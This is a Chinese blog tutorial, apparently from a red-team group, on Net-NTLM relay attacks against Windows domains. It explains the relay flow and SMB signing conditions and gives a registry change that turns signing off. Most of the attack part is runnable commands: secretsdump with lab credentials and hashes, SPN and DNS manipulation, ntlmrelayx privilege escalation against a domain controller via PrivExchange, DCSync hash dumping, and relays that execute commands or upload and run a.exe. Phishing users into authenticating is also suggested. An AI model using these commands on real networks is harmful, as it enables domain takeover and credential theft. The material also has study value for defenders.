域安全|Net-NTLM Relay Attack

最新推荐文章于 2024-10-17 13:38:34 发布
最新推荐文章于 2024-10-17 13:38:34 发布
阅读量3.7k 收藏 2
点赞数 1
分类专栏: 域渗透 文章标签: 安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42282189/article/details/123998870
版权

作者: 0xYyy
免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。

0x00 基本原理

1、正常的NTLM认证

在这里插入图片描述
2、重放攻击的NTLM认证过程
(1) Client端还是正常向服务端发送登录请求,由于client端此时并不知道攻击者的存在,它以为请求是发送给了server端,但实际上它是先发给了攻击者;

(2) 然后攻击者再拿着这个用户名伪装成client端发送给server端,此时server端正常返回一个challenge(挑战码);

(3) 攻击者拿到这个challenge(挑战码)以后,再把它返回给client端;

(4) Client 端拿到 challenge 在本地和自己的密码DES加密以后,会把这个response再次发送给攻击者,此时client依然认为攻击者就是server端;

(5) 最后,攻击者会拿着client端发过来的这个response再把它交给server端去验证server端此时到自己的数据库中对比,发现hash一致认证通过, 可见一次简单的smb中间人攻击就这样完成了。

3、攻击场景

(1)工作组环境(用处不大)

在工作组环境里面,工作组中的机器之间相互没有信任关系,每台机器的账号密码 Hash 只是保存在自己的 SAM 文件中,这个时候 Relay 到别的机器可能性就不大,除非两台机器的账号密码一样,不然毫无意义。

(2)域环境(主要在域环境下攻击)

我们知道在域环境下所有域用户的账号密码 Hash 都保存在域控的 ntds.dit 里面。若没有限制域用户登录到某台机子,那就可以将该域用户 Relay 到别人的机子,或者是拿到域控的请求,将域控 Relay 到普通的机子,比如域管运维所在的机器。

4、SMB攻击条件
目标机不能开启smb签名,否则利用无效,一般情况下 Windows Server 机器会默认开启,而Windows [win7/8/8.1/10]默认不会开启,可以利用nmap探测smb是否关闭。

一些打了ms08-068 [KB957097] 补丁的老系统,如 Windows xp/2003 以下的系统,也无法利用。

注意⚠️:域环境下域控默认开启 smb 签名


nmap -sT -p 445 -Pn --open --script smb-security-mode.nse 10.10.10.20

#需要关闭被攻击的域内机器
HKEY_LOCAL_MACHIME\System\CurrentControlSet\Services\LanManServer\Paramete
EnableSecuritySignature = 0
RequireSecuritySignature = 0

在这里插入图片描述
在这里插入图片描述
作用:在域环境中通过其他方式盗取域管认证后,继而从域控 relay 到普通域机器执行命令。

0x01 ntlmrelayx.py & Relay privexchange.py Attack

利用 Exchange SSRF 漏洞和 NTLM 中继沦陷域控

条件:

(1)域内账号

(2)存在exchange服务器

(3)修改攻击机hosts文件

快速命令:

#1、导出机器用户hash
secretsdump.py god.com/0x:"1qaz@WSX"@10.10.10.20

#2、手动添加SPN
python3 addspn.py -u god.com\\win2012\$ -p aad3b435b51404eeaad3b435b51404ee:11ac66c08ecc99ad7907687181cc2ea3 -s host/one.god.com 10.10.10.10 --additional

#3、指向SPN
python3 dnstool.py -u god.com\\win2012\$ -p aad3b435b51404eeaad3b435b51404ee:11ac66c08ecc99ad7907687181cc2ea3 -r one.god.com -d 10.10.10.1 --action add 10.10.10.10

注意⚠️:域外打需要添加、指向SPN
——————————————————————————————————————————————————————————————

#4、中继监听
python3 ntlmrelayx.py -t ldap://win-2016-dc.god.com --escalate-user 0x

#5、利用PrivExchange触发TGT
python3 privexchange.py -ah 10.10.10.1 10.10.10.20 -u 0x -p "1qaz@WSX" -d god.com

#6、直接导出DCsyncs
python3 secretsdump.py god.com/0x:"1qaz@WSX"@win-2016-dc.god.com -just-dc

1、手动添加SPN
在这里插入图片描述
2、指向SPN
在这里插入图片描述
3、ntlmrelayx.py中继监听


ntlmrelayx.py -t ldap://win-2016-dc.god.com --escalate-user 0x

在这里插入图片描述
4、利用PrivExchange触发获取TGT+ACL提权
在这里插入图片描述
5、直接导出DCsyncs
在这里插入图片描述

0x02 smbrelayx.py Relay Attack 执行命令

1、VPS 上执行命令监听 80 和 445 端口,伪造 http 和 smb 服务


#SMBRelay攻击域内主机10.10.10.20,并执行 whoami 命令
python3 smbrelayx.py -h 10.10.10.20 -c whoami

在这里插入图片描述
2、通过钓鱼或者其他手段诱导域管理员或域用户访问了攻击人员伪造的 HTTP 或 SMB 服务,访问 http://10.10.10.80 并输入账号密码进行认证:
在这里插入图片描述
3、此时就 Relay 成功获取到 192.168.0.128 的 system 权限(当然只是 whoami 命令,实战中可以直接远程加载 powershell 或者其他手段反弹 Shell 到 C2),或者访问任意资源。


dir \\10.10.10.80\c$

在这里插入图片描述

0x03 ntlmrelayx.py Relay Attack 执行命令

1、在VPS上执行如下命令监听 80 和 445 端口,伪造 http 和 smb 服务:


# SMBRelay 攻击10.10.10.20主机,并执行 whoami 命令
python3 ntlmrelayx.py -t smb://10.10.10.20 -c whoami -smb2support

##自动上传并执行
python3 ntlmrelayx.py -t smb://10.10.10.20 -smb2support -e a.exe

在这里插入图片描述
2、通过钓鱼或者其他手段诱导域管理员或域用户访问了攻击人员伪造的 HTTP 或 SMB 服务,访问http://10.10.10.80 并输入账号密码进行认证:
在这里插入图片描述
或者让域控随便访问一个资源使用 smb 触发:(因为它会检查本地 host 文件,然后检查 DNS,如果都不存在,就会通过 LLMNR 协议进行多播,在局域网中进行搜索。

此时可以在攻击机上看到 Responder 的响应,然后受害者的 Windows 机器会向攻击者进行身份验证)


dir \\10.10.10.80\c$

在这里插入图片描述
在这里插入图片描述

0x04 总结(使用 Responder & Inveigh )

内网渗透中若利用 LLMNR/NetBIOS 劫持成功并获得了目标主机的 Net-NTLM Hash,可以进行爆破,但需要一个强大的字典,否则很难得到明文密码。

由于 Net-NTLM Hash 不像 NTLM-Hash,不能用 Net-NTLM Hash 来进行 Pass The Hash,那么可以尝试一下 NTLM Relay Attack。

感谢团队师傅Nolan也帮忙解决了一点小bug。

0x05 了解更多安全知识

欢迎关注我们的安全公众号,学习更多安全知识!!!
欢迎关注我们的安全公众号,学习更多安全知识!!!
欢迎关注我们的安全公众号,学习更多安全知识!!!
在这里插入图片描述

灼剑(Tsojan)安全团队
关注
专栏目录
你所不知道的NTLM Relay
谢公子的博客
06-28 3563
目录 NTLM Relay 捕获Net-NTLM Hash NBNS&LLMNR 打印机漏洞 图标 Outlook 系统命令 office pdf WPAD XSS XXE&SSRF 重放Net-NTLM Hash Relay To SMB Relay To EWS Relay To LDAP NTLM Relay的防御 NTLM Relay NTLM Relay其实严格意义上并不能叫NTLM Relay,而是应该叫 Net-NTLM Relay。它是发
红队内网攻防渗透:内网渗透之内网对抗:横向移动篇&NTLM中继&Relay重放&SMB&EWS&LADP协议&强制认证&钓鱼监听
HACKONE的博客
06-25 164
NTLM Relay其实严格意义上并不能叫NTLM Relay,而是应该叫 Net-NTLM Relay。它是发生在NTLM认证的第三步,在 Type3 Response消息中存在Net-NTLM Hash,当攻击者获得了Net-NTLM Hash后,可以进行中间人攻击,重放Net-NTLM Hash,这种攻击手法也就是大家所说的NTLM Relay(NTLM 中继)攻击。2、利用Net-NTLM Hash中继攻击(Net NTLM Hash相同)#横向移动-NTLM中继-暴力破解&Relay攻击。
浅析NTLM Relay攻击
2401_84466229的博客
05-27 1039
NTLM Relay是一种中间人攻击的方式,一般而言都是被动攻击,等待连接操作,但PetitPotam的出现,发生了一些改变。正如上面实验,在两台控都安装了ADCS的情况下,不需要被动等待即可发起攻击。网络安全学习资源分享:给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。因篇幅有限,仅展示部分资料,朋友们如果有需要。
内网安全安全
m0_57836225的博客
09-04 416
环境中,所有的计算机和用户都属于这个,并且通过控制器进行身份验证和授权。提供了一种集中式的管理方式,可以方便地管理用户账户、计算机账户、安全策略、资源访问控制等。通过,管理员可以集中制定和实施安全策略,确保整个网络安全性和一致性。同时,也提供了单点登录功能,用户只需在中登录一次,就可以访问中的各种资源,提高了用户的工作效率。安全是在网络环境中通过集中管理和控制来确保内资源和用户安全的一种机制。是由一组计算机、用户和网络资源组成的逻辑集合,由控制器进行集中管理。
内网安全NTLM-Relay
qq_61553520的博客
01-28 1798
NTLM Hash,直接PTH;没有NTLM Hash,尝试抓取Net NTLM Hash,暴力破解明文密码,中继攻击。
(Net-)NTLM Relay(重放)
Canterlot的博客
09-06 697
详细介绍了 NTLM Relayntlm重放)的原理和相关工具的使用方法
NTLM Relay利用
qq_18811919的博客
03-07 3586
讲述了多种NTLM Relay的利用方式包括打印机bug以及PetitPotam强制触发NTLM认证方式以及Exchange Relay与ADCS Relay的利用
ADCS证书服务攻击
谢公子的博客
08-06 4538
ADCS支持几种基于HTTP的通过管理员可以安装的其他AD CS服务器角色功能。这些基于http的证书注册接口都是易受攻击的NTLM中继攻击,因为没有启用NTLM中继保护,而且Authorization HTTP 标头明确只允许通过 NTLM 身份验证,因此更安全的协议(如 Kerberos)无法使用。 http://10.211.55.4/certsrv/certfnsh.asp 漏洞复现 定位证书服务器机器 certutil -config - -ping ntlmrela
基于NTLM认证的中间人攻击(含实战)
Blue_Arc的博客
08-04 2518
文章目录中间人攻击0x01 和工作组0x02 NTLM认证(Windows)本地认证NTLM Hash的生成网络认证工作组环境NTLM认证流程环境NTLM认证0x03 名解析协议LLMNR解析过程NetBIOSWindows系统名解析顺序0x04 WPAD工作原理WPAD劫持0x05 NTLM中继0x06 Responder介绍攻击演示利用LLMNR和NetBIOS截取Net-NTLM Hash利用WPAD劫持获得Net-NTLM HashSMB Relay总结**Reference** 中间人攻击
网络安全渗透之完全绕开安全组件
HBohan的博客
04-02 4048
Summary 实战与靶机环境差别很大,内网的微软ATP组件、Fortinet 与CS(CrowdStrike)的Falcon安全组件过于强大,很多工具都是根本无法使用的,免杀后会有各种问题.尤其是CS,不愧为北美最强EDR。 本地免去了隐蔽隧道联通外网搭建的过程,简单了一些,因为微软漏洞一直有专门的TSG打补丁,所以单独靠CVE难比登天。本文就这段时间的行动与思考做一个记录,Rspect! Information collection 首先是常规的一些用户权限,内环境等信息获取。测试账户是User Do
Ntlm Relay详解
2301_79403927的博客
11-09 232
Ntlm Rleay翻译过来就是Ntlm 中继的意思,也肯定是跟Ntlm协议是相关的,既然要中继,那么攻击者扮演的就是一个中间人的角色,类似于ARP欺骗,ARP欺骗就是在一个广播中发送一些广播,然后大声问这个IP地址的MAC地址是多少啊???如果有不怀好意的人回答了,那么就造成了ARP欺骗,好似一个中间人攻击。
NTLM-relay攻击
内心不种满鲜花就会长满杂草
03-07 2009
在上一篇笔记中,介绍了ntlm网络认证的原理 ——> NTLM网络认证协议分析及Net-NTLMhash的获取,我们获取了Net-NTLMhash值,但是我们爆破不出密码,可以使用NTLM-relay攻击,relay就是中继的意思。 NTLM Relay原理 在Client视角下,Attacker是它的服务端,模拟客户端完成访问请求。 在Server视角下,Attacker是它的客户端,伪造客户端完成身份验证。 攻击者所做的事情只是把所有客户端的请求relay到服务端,并把所有服务端.
一文详解Ntlm Relay
最新发布
2401_84466359的博客
10-17 814
Ntlm Rleay翻译过来就是Ntlm 中继的意思,也肯定是跟Ntlm协议是相关的,既然要中继,那么攻击者扮演的就是一个中间人的角色,类似于ARP欺骗,ARP欺骗就是在一个广播中发送一些广播,然后大声问这个IP地址的MAC地址是多少啊???如果有不怀好意的人回答了,那么就造成了ARP欺骗,好似一个中间人攻击。
安全(1)的基本知识
weixin_51339377的博客
03-27 1095
1.相比于传统的渗透测试,红队的攻击较为接近真实的入侵活动 红队是不择手段的,渗透测试是限定方法的 2.很多攻击手段都不是完全孤立的,而是连动化攻击 3.熟练掌握工具只是一小部分,各种原理的深度理解以及二次定制能力才是核心 4.内网的渗透测试(红队)比外网(渗透测试)要复杂很多,所以工具的使用并不是真正的核心 web打点优先考虑点: EDU:教务,新生报名,新生招待,毕业生论文答辩,毕业查询系统 医院:HIS(管理信息系统,临床医疗信息系统,医院信息系统的高级应用) 政府:政务云平台..
NTLMRelay的利用
Ms08067安全实验室
09-06 892
0x00 相关概念NTLM hash 和 Net-NTLM hash1、NTLM hash是指Windows系统下Security Account Manager中保存的用户密码hash。该hash的生成方法:复制将明文口令转换成十六进制的格式 转换成Unicode格式,即在每个字节之后添加0x00 对Unicode字符串作MD4加密,生成32位的十六进制数字串2、Net-NTLM hash是指网...
重放攻击
jiangbin00cn的专栏
11-07 7246
重放攻击是计算机世界黑客常用的攻击方式之一,它的书面定义对不了解密码学的人来说比较抽象。我就通过一个故事来说明它吧!/////////////////////////////////////////故事的分割线/////////////////////////////////////////阿里巴巴和40大盗的故事人物:黑客:阿里巴巴用户:40大盗系统:宝库身份认证:石门故事情节:
ntlm relay 原理
09-17
NTLM Relay 是一种攻击技术,利用了 NTLM(Windows 网络身份验证协议)的漏洞。该攻击允许黑客在网络中伪装成受害者与服务器进行通信,从而获取敏感信息或执行一些恶意操作。 NTLM Relay 攻击的原理如下: 1. 受害...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

灼剑(Tsojan)安全团队

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值